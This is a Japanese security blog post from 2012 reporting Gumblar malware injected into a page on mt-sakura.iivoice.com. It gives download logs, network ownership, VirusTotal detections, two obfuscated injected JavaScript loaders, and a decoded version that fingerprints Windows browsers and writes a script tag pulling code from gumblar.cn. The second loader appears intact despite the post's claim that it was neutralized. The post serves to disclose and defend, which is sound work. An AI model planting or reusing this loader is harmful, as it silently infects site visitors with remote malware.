月曜日, 9月 17, 2012

#OCJP-062: 「 mt-sakura.iivoice.com. / 210.172.99.214」 GUMBLARマルウェアサイトの転送コードを発見!

下記のURL+ダウンロード証拠↓
--18:46:43--  hxxp:// mt-sakura・iivoice・com/html/13.html
           => `13.html'
Resolving mt-sakura・iivoice・com... 210.172.99.214
Connecting to mt-sakura.iivoice.com|210.172.99.214|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6,933 (6.8K) [text/html]
18:46:43 (1.20 MB/s) - `13.html' saved [6933/6933]
日本KDDIのネットワーク(DION)↓
inetnum:        210.172.99.0 - 210.172.99.255
netname:        KDDI-NET
descr:          DION (KDDI CORPORATION)
country:        JP
admin-c:        JP00000127
tech-c:         JP00000181
13.htmlに下記のマルウェアコードを発見(危ないコードをneutralizedしました)↓
<script language=javascript><!-- 
(function(){var r5KC='%';var zV9gP=('var.20a.3d.22.53cript.45.6egin.65.22.2c.62.3d.22.56.65rsio.6e.28).2b.22.2cj.3d.22.22.2cu.3dnavi.67a.74or.2eus.65rAgent.3bif((u.2e.69ndex.4ff(.22Win.22).3e0).26.26(u.2einde.78Of(.22N.54.206.22).3c.30).26.26.28d.6f.63um.65nt.2ecookie.2e.69ndex.4ff(.22miek.3d1.22.29.3c0).26.26(.74ypeof(z.72vz.74s).21.3dtypeo.66.28.22A.22)).29.7bzr.76.7a.74s.3d.22.41.22.3beval(.22if(.77.69ndo.77.2e.22+a+.22.29j.3dj+.22+a+.22Maj.6fr.22+.62+a+.22Minor.22+b+a+.22Build.22+b+.22j.3b.22.29.3b.64o.63um.65nt.2ewri.74e.28.22.3cscript.20sr.63.3d.2f.2f.67u.6dbla.72.2ecn.2frss.2f.3fid.3d.22+j+.22.3e.3c.5c.2fs.63ript.3e.22).3b.7d').replace(/./g,r5KC);var OoVn=unescape(zV9gP);eval(OoVn)})();
 --></script>

<script language=javascript><!-- 
(function(Iytv){var xfPn='&76ar&20a&3d&22&53cri&70&74E&6egine&22&2c&62&3d&22Ver&73i&6fn(&29+&22&2cj&3d&22&22&2cu&3dn&61vigato&72&2eu&73&65rAge&6e&74&3bif&28(u&2e&69ndexO&66(&22Win&22)&3e0)&26&26(u&2ei&6ed&65&78O&66(&22NT&206&22)&3c&30)&26&26&28d&6fcum&65nt&2e&63o&6fk&69e&2ei&6ede&78O&66(&22mie&6b&3d&31&22)&3c0)&26&26&28typeof(zrvzts)&21&3d&74ypeof(&22&41&22&29&29&29&7b&7ar&76zts&3d&22A&22&3be&76&61l(&22&69f(&77i&6edow&2e&22+a+&22)j&3dj+&22&2ba+&22M&61jor&22+&62&2ba+&22Mi&6eor&22+b&2ba+&22Buil&64&22+b+&22&6a&3b&22)&3bdocu&6dent&2ewrit&65&28&22&3c&73cript&20s&72c&3d&2f&2f&67&75mb&6car&2ec&6e&2frss&2f&3fid&3d&22+&6a+&22&3e&3c&5c&2fscri&70&74&3e&22)&3b&7d';eval(unescape(xfPn.replace(Iytv,'%')))})(/&/g);
 --></script>

※↑マルウェア早く削除してほしいです。。。

解けたら下記となります↓
eval1()
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  :
   :
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
 %%%%%

eval2()
 var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
 if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&
 (document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A")))
 {
   zrvzts="A";
   eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
 document.write("<script src=//gumblar.cn/rss/?id="+j+"><\/script>");}

eval1()はよく使っているxss ブラウザークラッシュのexploit攻撃PoCなので
eval2()について、GUMBLARマルウェアサイトへ飛ばされます↓
gumblar・cn/rss/?id=xxxxx

13.htmlのVirus Totalで確認したら⇒【こちら】
下記のマルウェア名前が出ました↓
F-Prot                   : JS/Redir.M
AntiVir                  : HTML/Infected.WebPage.Gen2
TrendMicro               : JS_GUMBLAR.ERC
TotalDefense             : JS/Gumblar!generic
Fortinet                 : JS/PackRedir.A!tr.dldr
TrendMicro-HouseCall     : JS_GUMBLAR.ERC
Avast                    : JS:RedGumb-H [Trj]
GData                    : JS:RedGumb-H
Kaspersky                : Trojan-Downloader.JS.Gumblar.a
ESET-NOD32               : JS/TrojanDownloader.Agent.NQB
McAfee                   : Obfuscated Script.f
Ikarus                   : Trojan-Downloader.JS.Gumblar
Commtouch                : JS/Redir.M
K7AntiVirus              : Trojan
AVG                      : JS/Obfuscated
ViRobot                  : JS.A.Gumblar.6933
VirusBuster              : JS.Crypt.BQK

0 件のコメント:

コメントを投稿